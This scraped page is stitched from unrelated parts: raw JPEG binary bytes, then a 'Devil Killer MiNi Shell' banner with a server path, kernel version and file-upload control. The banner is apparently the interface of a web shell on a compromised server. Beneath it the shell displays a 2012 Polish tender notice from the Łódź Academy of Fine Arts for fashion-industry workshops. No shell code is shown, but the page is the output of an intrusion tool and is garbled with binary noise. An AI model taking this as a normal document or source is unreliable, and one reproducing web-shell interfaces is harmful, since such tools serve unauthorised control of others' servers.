JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/64366-N-2012.html

<p class="kh_header"><b>Łódź: Realizacja zadań merytorycznych - Animacja powiązań kooperacyjnych - doradztwo/warsztaty w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój</b><br>
<b>Numer ogłoszenia: 64366 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi , ul. Wojska Polskiego 121, 91-726 Łódź, woj. łódzkie, tel. 042 2547408, centrala 2547598, faks 042 2547418.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja zadań merytorycznych - Animacja powiązań kooperacyjnych - doradztwo/warsztaty w ramach projektu: Centrum Promocji Mody - klaster branży tekstylno-odzieżowej - Rozwój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu:
Doradztwa/warsztatów w ramach projektu pt. Centrum Promocji Mody - Klaster branży tekstylno - odzieżowej - Rozwój, na które składa się 10 części: 
1.	Doradztwo/warsztaty pn. Moda, stylizacja, trendy,
2.	Doradztwo/warsztaty pn. Marketing w firmie odzieżowej,
3.	Doradztwo/warsztaty pn. Cele i możliwości spotkań środowiska mody,
4.	Doradztwo/warsztaty pn. Przedsiębiorczość w przemyśle odzieżowym,
5.	Doradztwo/warsztaty pn. Ośrodki wspierające projektanta w Polsce,
6.	Doradztwo/warsztaty pn. Komunikacja interpersonalna i komunikacja rynkowa w budowaniu wizerunku,
7.	Doradztwo/warsztaty pn. Negocjacje handlowe w branży modowej,
8.	Doradztwo/warsztaty pn. Efektywność osobista z elementami inteligencji emocjonalnej,
9.	Doradztwo/warsztaty pn. Rola projektanta w dużej firmie odzieżowej,
10.    Doradztwo/warsztaty pn. Promocja projektanta w mediach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia powyższych warunku Wykonawca zobowiązany jest przedstawić wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich wykształcenia, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - według załącznika nr 5 do SIWZ:

Część1 - Minimum dwóch Wykładowców-Projektantów, którzy wykażą się łącznie: 
tytuł magistra sztuki, specjalność projektowanie ubioru lub druk odzieżowy,
	min 10-letnim doświadczeniem w projektowaniu autorskiej kolekcji pod własną marką,
	min 10-letnim doświadczeniem w prezentacji własnych kolekcji ubiorów damskich i akcesoriów w formie otwartych pokazów mody dla min. 400 osobowej widowni.
	min. 5 nagród liczących się w branży modowej,
	doświadczeniem w zakresie współpracy z min. 2 firmami odzieżowymi,
	wiedzę na temat najnowszych trendów w modzie, stylizacji sylwetki,  
	doświadczenie w pracy jako stylista.

Część 2:
Minimum jeden Wykładowca, który posiada:
- wykształcenie wyższe,
- Doświadczenie zawodowe:
	udokumentowane  min. 10 letnie doświadczenie zawodowe na stanowiskach menedżerskich w branży odzieżowej
	udokumentowane min 5 letnie doświadczenie pedagogiczne

Kluczowe kompetencje:
Szkoleniowe
	17 letnie doświadczenie w prowadzeniu szkoleń, warsztatów, treningów
	6-letnie doświadczenie w prowadzeniu coachingów warsztatowych
	4-letnie doświadczenie w prowadzeniu coachingów rozwojowych dla kadry menadżerskiej
	przygotowywanie projektów, programów szkoleniowych 
	analiza potrzeb szkoleniowych
	ocena i raportowanie

Menadżerskie
	10 letnie doświadczenie w zarządzaniu zespołem
	realizacja celów strategicznych firmy, zarządzanie projektami
	pozyskiwanie źródeł finansowania

Certyfikaty:
	CoachWise-Essentials Program
	Mini MBA - Polsko Amerykańskie Centrum Zarządzania
	Negocjacje - Polsko Amerykańskie Centrum Zarządzania

Część 3:
Jeden wykładowca posiadający:
- wyższe wykształcenie w zakresie projektowania 
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie dla minimum 2 tysięcy osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- minimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody

Część 4:
Jeden wykładowca posiadający:
- wyższe wykształcenie w zakresie projektowania,
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie dla minimum 2 tysięcy osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- minimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody

Część 5:
Jeden wykładowca posiadający:
- wyższe wykształcenie w zakresie projektowania 
- minimum 20-sto letnie doświadczenie w branży mody 
- organizacja minimum 5-ciu imprez wystawienniczo-pokazowych (dziennie dla minimum 2 tysięcy osób odwiedzających imprezę)
- minimum 20-sto letnie prowadzenie działalności gospodarczej związanej z branżą mody 
- minimum 19-sto letnia współpraca z zagranicznymi partnerami z branży mody
- organizacja minimum 100 pokazów mody

Część 6:
Jednego wykładowcę (trenera-coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej

Część 7:
Jednego wykładowcę (trenera-coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej

Część8:
Jednego wykładowcę (trenera-coacha) posiadającego:
- wyższe wykształcenie w zakresie psychologii i zarządzania, 
- minimum 10-cio letnie doświadczenie w pracy dydaktycznej i trenerskiej (łącznie), 
- minimum 10-cio letnie doświadczenie w prowadzeniu szkoleń i warsztatów dla kadry zarządzającej i kierowniczej przedsiębiorstw, firm, urzędów, podnoszących kompetencje menedżera m.in. w zakresie: zarządzania i kierowania zespołem, komunikacji, technik negocjacyjnych, obsługi klienta, efektywności osobistej

Część9:
Jednego wykładowcę (trenera-coacha) posiadającego:

- wyższe wykształcenie w zakresie projektowania odzieży
- minimum 10-cio letnie doświadczenie jako projektanta w pracy w dużych firmami odzieżowych
- minimum 10-cio letnie doświadczenie w projektowaniu dla firm oraz tworzeniu własnych autorskich kolekcji
- budowanie od podstaw nowej marki odzieżowej.

Część 10:
Jednego wykładowcę (trenera/coacha) posiadającego:
- wyższe wykształcenie artystyczne,
- udokumentowane przygotowanie pedagogiczne,
- minimum 20-letnie doświadczenie w pracy dziennikarza telewizyjnego, w szczególności  w zakresie prowadzenia serwisów informacyjnych, wydawanie i prowadzenie programów autorskich - magazynów o tematyce kulturalnej, prowadzenie programów ogólnopolskich o charakterze publicystycznym, przygotowanie codziennych relacji reporterskich, felietonów, reportaży w każdej dziedzinie. Specjalizacja - relacje o charakterze kulturalnym - wystawy, relacje z pokazów mody, koncerty.
- doświadczenie w prowadzeniu halowych i plenerowych imprez o charakterze kulturalnym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1) Wypełniony Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do SIWZ, 
2) Dokumenty i oświadczenia Wykonawcy potwierdzające spełnienie warunków udziału w postępowaniu - zgodnie z pkt 12 i 13 SIWZ,
3) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
5) Pozostałe dokumenty wymienione w pkt 12, 13 SIWZ.
Zalecane przez Zamawiającego jest złożenie w ofercie spisu treści z wyszczególnieniem ilości stron wchodzących w skład oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian w zawartej umowie w sprawie zamówienia publicznego, w toku jej realizacji:
1.	Wszelkie zmiany umowy, o ile konieczność ich wprowadzenia będzie wynikała ze zmian w obowiązujących przepisach prawa.
2.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy wskutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu. 
3.	Zmiana podyktowana jest okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy, tj.: odwołanie warsztatu/doradztwa, choroba Wykonawcy uniemożliwiająca osobiste przeprowadzenie warsztatu/doradztwa,
4.	Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu systemowego lub wytycznych dotyczących realizacji zamówienia.
5.	Wydłużenie terminu płatności za realizację zadania do czasu otrzymania środków z Instytucji Zarządzającej. Maksymalny termin przedłużenia terminu płatności to 3 miesiące licząc od daty, otrzymania faktury/rachunku od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.asp.lodz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 10:00, miejsce: Siedziba Zamawiającego - Akademia Sztuk Pięknych im. Władysława Strzemińskiego 121, Łódź, pok. 41, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach zintegrowanego projektu Centrum Promocji Mody - Klaster branży tekstylno - odzieżowej Regionalny Program Operacyjny Województwa Łódzkiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doradztwo-warsztaty pn. Moda, stylizacja, trendy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 
Warsztaty-doradztwo pn. Moda, stylizacja, trendy

Pierwszy dzień (sobota) 
Warsztaty: Stylizacja sylwetki
Omówienie najnowszych tendencji w modzie - jak je odnieść do siebie i do swojej sylwetki 
Omówienie sylwetek damskich i męskich - typy/patenty stylizacyjne na każdą z sylwetek
Jak dobrać ubrania do określonego typu sylwetki
Sukienki, bluzki, tuniki  - ukrywanie mankamentów i eksponowanie atutów sylwetki 
Wybieranie dodatków, bielizny - wybieranie strojów na poszczególne okazje - biuro, impreza, ślub itd.
Tajne tricki stylisty  
Indywidualne porady projektantów - indywidualne znalezienie odpowiedniego kroju, kolorystyki, stylu

Drugi dzień (niedziela)
Case study - Jak stworzyć i sprzedać kolekcje 
Określenie targetu i odbiorcy kolekcji 
Szukanie inspiracji i przekładanie jej na konkretną kolekcję 
Różnica pomiędzy kolekcją artystyczną/wybiegową a kolekcją gotową do sprzedaży w butiku- PRET-A-PORTER
Przygotowanie pokazu mody i kampanii reklamowej 

Cel warsztatu/doradztwa:

Poznanie najnowszych tendencji panujących w modzie. 
Poznanie technik i narzędzi stylizacji sylwetki. 
Poznanie metodyki przygotowania, wykonania, prezentacji, sprzedaży autorskiej kolekcji.
Ugruntowanie wiedzy w zakresie mody, stylizacji, trendów.


Metodyka
Spotkanie prowadzone będzie w formie treningu umiejętności, z wykorzystaniem aktywnych metod dydaktycznych, metodą warsztatową, z wykorzystaniem prezentacji medialnej, w sposób interaktywny, włączającą  do udziału wszystkich uczestników warsztatów. 

Materiały szkoleniowe: 
Wykonawca zobowiązany jest przygotować narzędzia, materiały niezbędne do przeprowadzenia warsztatów. Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących tematyki warsztatu-doradztwa. 

Osoby przewidziane do realizacji zamówienia:
Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:
Dwóch Wykładowców/Projektantów posiadających:  
tytuł magistra sztuki, specjalność projektowanie ubioru lub druk odzieżowy
min 10-letnie doświadczenie w projektowaniu autorskiej kolekcji pod własną marką,
min 10-letnie doświadczenie w prezentacji własnych kolekcji ubiorów damskich i akcesoriów w formie otwartych pokazów mody dla min. 400 osobowej widowni.
min. 5 nagród liczących się w branży modowej,
doświadczenie w zakresie współpracy z min. 2 firmami odzieżowymi,
wiedzę na temat najnowszych trendów w modzie, stylizacji sylwetki,  
doświadczenie w pracy jako stylista..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Doradztwo-warsztaty pn. Marketing w firmie odzieżowej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 	
Warsztaty-doradztwo pn. Marketing w firmie odzieżowej.


Cele warsztatu-doradztwa:
Zapoznanie z elementami marketingu w branży odzieżowej, zasadami  analizowania działań 
konkurencji, dostosowania oferty.
Zapoznanie uczestników szkolenia z zasadami skutecznego biznesu.
Zapoznanie uczestników   z zasadami tworzenia profesjonalnego wizerunku firmy i jej funkcjonowania w otoczeniu biznesowym.
Przekazanie wiedzy z zakresu technik sprzedaży, psychologii klienta, rozmów handlowych


Program warsztatu-doradztwa:
I część - 8 godz. dydaktycznych w terminie 15 marca 2012r.-30 czerwca 2012r. 

1.Rola marketingu w praktyce biznesowej branży odzieżowej
2.Rynek- kategorie marketinnowe
3.Plan marketingowy- narzędzie promocyjne firmy
4.Strategie marketingowe- otoczenie firmy, benchmarking, budowanie tożsamości, misja, wizerunek firmy itp.
5.Analiza oferty rynkowej, analiza rynku, klienta
6.Tworzenie marki
7.Promocja marki
8.Utrzymanie marki -bodźcowanie rynku i klientów(metody, techniki itp)


II część -  8 godz. dydaktycznych w terminie 01 października 2012r.-31 grudnia 2012r.

1.Kształtowanie wizerunku firmy
2.Środki identyfikacji firmy
-wizualne
-pozawizualne
3.System identyfikacji wizualnej
4.Public relations i jego zastosowanie w firmie odzieżowej
5.Standardy obsługi klienta
6.Księga standardów
7.Relacje z klientami firmy 
8.Programy lojalnościowe

Metoda prowadzenia doradztwa-warsztatu: 
 Wykład interaktywny, warsztat.  Trening umiejetności-symulacje, testy pozwalające na dokonanie samooceny  umiejętności
Analiza przypadków
Gry menadżerskie

Materiały szkoleniowe: wykonawca w odniesieniu do każdej części zamówienia zobowiązany jest przygotować materiały szkoleniowe dotyczące tematyki doradztwa/warsztatu.  Każdy z uczestników musi otrzymać po jednym egzemplarzu materiałów szkoleniowych dotyczących danej tematyki. Dodatkowo jeden egzemplarz materiałów szkoleniowych wykonawca zobowiązany jest przekazać Zamawiającemu.
Osoby przewidziane do realizacji zamówienia

Kadra dydaktyczna wskazana przez wykonawcę powinna obejmować:

Jednego wykładowcę posiadającego:
- Wykształcenie wyższe 
- Doświadczenie zawodowe:
	udokumentowane  min. 10 letnie doświadczenie zawodowe na stanowiskach menedżerskich w branży odzieżowej
	udokumentowane min 5 letnie doświadczenie pedagogiczne

Szkoleniowe
	17 letnie doświadczenie w prowadzeniu szkoleń, warsztatów, treningów
	6-letnie doświadczenie w prowadzeniu coachingów warsztatowych
	4-letnie doświadczenie w prowadzeniu coachingów rozwojowych dla kadry menadżerskiej
	przygotowywanie projektów, programów szkoleniowych 
	analiza potrzeb szkoleniowych
	ocena i raportowanie

Menadżerskie
	10 letnie doświadczenie w zarządzaniu zespołem
	realizacja celów strategicznych firmy, zarządzanie projektami
	pozyskiwanie źródeł finansowania

Certyfikaty:
	CoachWise-Essentials Program
	Mini MBA - Polsko Amerykańskie Centrum Zarządzania
Negocjacje - Polsko Amerykańskie Centrum Zarządzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Doradztwo/warsztaty pn. Cele i możliwości spotkań środowiska mody,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagany zakres warsztatów/doradztwa:
przeprowadzenie dwóch spotkań o charakterze warsztatowym i doradczym dla studentów Akademii w zakresie:
1.	Spotkania branżowe na rynku modowym
- cele spotkań środowiska mody
- charakter spotkań środowiska mody w Polsce i na świecie
          - rodzaje imprez kierowanych do branży modowej
          		
2.	Organizacja spotkań środowiska mody 
          -    określenie charakteru imprezy i budowanie programu merytorycznego
-	planowanie budżetu 
          -    rola partnerów medialnych 
          -    pozyskiwanie partnerów i sponsorów 
          -    produkcja
          -    znaczenie ewaluacji 
 
3.	Case study - FashionPhilosophy Fashion Week Poland
-	charakter i założenia 
-	rozwój
-	osiągane cele

4.	 Uczestnictwo w spotkaniach środowiska mody - część warsztatowa w grupach:
